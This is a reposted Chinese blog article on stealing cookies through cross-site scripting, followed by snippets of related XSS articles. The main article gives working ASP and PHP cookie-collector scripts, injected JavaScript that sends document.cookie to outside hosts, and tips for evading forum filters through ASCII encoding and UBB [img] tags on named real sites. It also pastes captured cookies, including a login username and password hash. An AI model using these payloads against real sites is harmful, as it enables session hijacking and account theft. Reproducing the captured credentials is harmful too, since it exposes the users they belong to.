[转]跨站攻击-偷cookies

最新推荐文章于 2024-11-04 16:17:23 发布
最新推荐文章于 2024-11-04 16:17:23 发布
阅读量770 收藏
点赞数
文章标签: cookies javascript login header string query
< %
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
% >




< script>window.open('http://www.aapet.com/co.asp?msg='+document.cookie


1. 构造一个提交,目标是能够显示用户Cookie信息:
http://www.5460.net/txl/login/login.pl?username= &passwd=&ok.x=28&ok.y=6
2. 如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求:
http://www.5460.net/txl/login/login.pl?username= &passwd=&ok.x=28&ok.y=6


其中http://www.notfound.org/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信息,内容如下:
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."/n");
fclose($fp);
}
header("Location: http://www.5460.net");
注:"%2B"为"+"的URL编码,并且这里只能用"%2B",因为"+"将被作为空格处理。后面的header语句则纯粹是为了增加隐蔽性。
3. 如果上面的URL能够正确运行的话,下一步就…………

涉及到跨站技巧的问题。像大部份论坛,都过滤了javascript这个字符。有个小技巧是可以利用的,可以在论坛发的贴里将javascript写成ascii码。像j可以写成”j”

再如a可以写成”a”,你可以找一个ascii码表对照修改一下,这样成功率能高一点。还有,你要学会分析一下对方的ubb代码。像动网5.0以下论坛,你在[img]里写入和bbs3000一样的代码就不会成功,因为动网5.0以下,ubb代码http://这个地方当成图片地址了,结你提交的代码被分成了两段javascript:window.open('和http://www.netsill.net/lcx/info.asp?msg='+.); ,以至于我们提交的代码丧失了功能。难道就不能攻击了吗?当然不是,我们可以变换种方式提交,在[img]中插入代码如下:

javascript:window.open('http://www.netsill.net/lcx/info.asp?msg

如下图:我偷的cookies:
msg=ASPSESSIONIDSSDCTDDC=IJNFFJBABCCGKBMFKHOKFJBI;%20ASPSESSIONIDAAQCQBAA=NLJPKNBANJNPDGFPENJFPJHE;%20joekoe%5Fonline=login%5Fid=&login%5Fpassword=&login%5Fusername=&guest%5Fname=%D3%CE%BF%CD38869331&cookies%5Ftrue=yes&vc%5Fup%5Fnews=jk8822;%20ASPSESSIONIDCCRDQBAB=NGGFCCCAEAECNNPOKHFOCJNK;%20ASPSESSIONIDQQBDSDDC=PEJBBFCAPKOKKLHBIMFEBPHA
msg=ASPSESSIONIDSSDCTDDC=IJNFFJBABCCGKBMFKHOKFJBI;%20ASPSESSIONIDAAQCQBAA=NLJPKNBANJNPDGFPENJFPJHE;%20joekoe%5Fonline=login%5Fpassword=b7f688e82b6451c2&login%5Fid=4&login%5Fusername=xgb&time%5Fload=2005%2D8%2D15+16%3A04%3A49&guest%5Fname=%D3%CE%BF%CD38869331&cookies%5Ftrue=yes&vc%5Fup%5Fnews=jk8822;%20ASPSESSIONIDCCRDQBAB=NGGFCCCAEAECNNPOKHFOCJNK;%20ASPSESSIONIDQQBDSDDC=PEJBBFCAPKOKKLHBIMFEBPHA
nonsenser
关注
XSS(你的Cookies)
qq_27552077的博客
03-12 1万+
XSS(Cross Site Scripting),跨站脚本攻击,取名XSS是避免和CSS同名。XSS攻击原理:攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。同时这也因为HTTP采用的明文模式,这样就让黑客有机可乘了(在我另一篇文章介绍过利用fiddle可以捕获HTTP报文)。我发现网上很多关于XSS攻击的文章都没
盗用cookie的目的和防盗cookie的手段
ITWANGBOIT的博客
10-27 1万+
前提 虽然通过使用springsecurity我们防御了会话固定攻击,但是如果黑客等待合法用户登录系统之后,再从合法用户浏览器中拿到名字为JSESSIONID的cookie,然后放入黑客自己的浏览器的cookie中,这样以来当黑客带着盗窃来的JSESSIONID访问系统时,后端系统会根据JSESSIONID找到对应的session,就会把该次请求当成是认证通过的用户发送的请求;这样黑客就可以为所欲为了。 实践 如下图: 经过上图的实践,证明我的分析是合理的,只要能拿到认证通过的用户的cook
利用xsscookie教学
cnbird's blog
06-24 4594
使用的工具: 1.免费网页支援PHP 2.存在xss的脆弱的网站。 vb.php为存放cookie的网页 PHP Code:Cookies Stealther - Designed and programmed by R00t[ATI]or="#C0C0C0">COOKIES STEALTHERBy R00T[AT
XSS跨站攻击详解
scmrpu
05-28 2665
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3694
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
网络安全学习笔记——盗取Cookies跨站脚本(XSS)
just do it
07-24 1721
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSS(跨站脚本攻击
yingrenzhe68的专栏
12-09 109
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。 [color=red]XSS 是如何发生的呢[/color] 假如有下面一个textbox...
XSS跨站脚本攻击漏洞
weixin_43211186的博客
01-10 3443
XSS跨站脚本攻击漏洞 文章目录XSS跨站脚本攻击漏洞0x01 XSS 背景0x02 XSS 概论利用XSS漏洞XSS攻击的类型反射型XSS:存储型XSS:DOM型XSS:0x03 最常见的cookies类型a.Session Cookieb.Persistent Cookiec.Secure cookied.HttpOnly Cookiee.3rd-party cookief.Super Cookie0x04常见标签0x05 检测XSS的办法内容安全策略(CSP)输入文本验证库或框架XSSer 0x01
跨站脚本攻击XSS介绍、原理、分类、利用、防御
qq_37432174的博客
11-22 3154
跨站脚本攻击,恶意攻击者插入恶意Html或Script等脚本代码到用户浏览的web网页上,当用户浏览该页之时,因WEB应用程序对用户输入过滤不足,嵌入其中Web里面的恶意脚本代码会被执行,从而达到恶意攻击用户的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个基础上,黑客可以轻易地发起Cookie窃取,会话劫持,钓鱼欺骗等各种各样的攻击
ASP利用XMLHTTP实现表单提交以及cookies的发送的代码
10-30
这在某些情况下用来防止CSRF(跨站请求伪造)攻击。"Referer"字段应包含发起请求页面的完整URL。 在这段内容中也提到,尽管ASP在处理这些任务时没有PHP那样灵活强大,但通过正确使用XMLHTTP对象的方法,仍然可以...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1682
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
Cookie窃取攻击
热门推荐
熊俊坤的博客
11-11 1万+
Cookie窃取攻击XSS跨站攻击就是攻击者通过一些正常的站内交互途径(发布文章、添加文章、发送邮件、留言),提交含有恶意javascript脚本代码的文本内容。如果服务器端没有过滤这些恶意脚本,反而将其作为网站内容发布到Web页面上。当其他用户访问该页面的时候,这些恶意脚本就会被执行,用户就会被收到攻击
CSRF的攻击与防御原理
小晓晓晓林的博客
08-22 2212
CSRF(Cross Site Request Forgery)跨站域请求伪造,是一种网络的攻击方式,它在2007年曾被列为互联网20大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用,也就是人们所知道的钓鱼网站。 CSRF介绍 CSRF攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻...
CesiumJS 案例 P12:添加指定长宽的图片图层并居中显示(圆点分别为图片图层的中心点、左上角顶点、右上角顶点、左下角顶点、右下角顶点)
weixin_52173250的博客
10-30 1137
CesiumJS 案例 P12:添加指定长宽的图片图层并居中显示(圆点分别为图片图层的中心点、左上角顶点、右上角顶点、左下角顶点、右下角顶点)
一些常用的react hooks以及各自的作用
weixin_48602044的博客
11-01 392
关于react hooks的一些知识与应用
JavaScript 生成二维码
qq_30049249的博客
11-02 208
我试过了,这一款js库支持中英文混合。进入网站后,可以直接点击运行哟~
安利一款开源企业级的报表系统SpringReport
luck332的专栏
11-04 446
SpringReport是一款企业级的报表系统,支持在线设计报表,并绑定动态数据源,无需写代码即可快速生成想要的报表,可以支持excel报表和word报表两种格式,同时还可以支持excel多人协同编辑,后续考虑实现大屏设计器功能,通过简单的设计器可以生成炫酷的大屏效果。
Vue2+3
最新发布
m0_73557953的博客
11-04 46
创建Vue实例 Vue指令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值